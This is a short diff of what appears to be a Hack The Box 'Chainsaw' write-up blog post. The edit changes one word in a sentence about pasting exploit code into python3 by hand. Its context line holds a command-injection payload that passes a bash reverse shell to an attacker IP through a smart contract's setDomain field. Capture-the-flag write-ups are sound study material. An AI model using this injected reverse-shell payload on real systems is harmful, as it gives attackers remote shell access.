defarbs/defarbs.github.io/_posts/2019-11-23-htb-chainsaw.md

 contract.functions.setDomain("10.10.14.34; bash -c 'bash -i >& /dev/tcp/10.10.14.34/9001 0>&1'").transact()
 ```

 I did not run the exploit directly with `python` either.
-Instead, I ran `python3` and then copy and pasted everything contained in `exploit.py` and did it all manually.
+Instead, I ran `python3` and then copy and pasted everything contained in `exploit.py` and ran it all manually.
 I'm sure there is a way to autopwn the first hurdle, but I haven't taken the time to write anything for it so far.

 <p><br></p>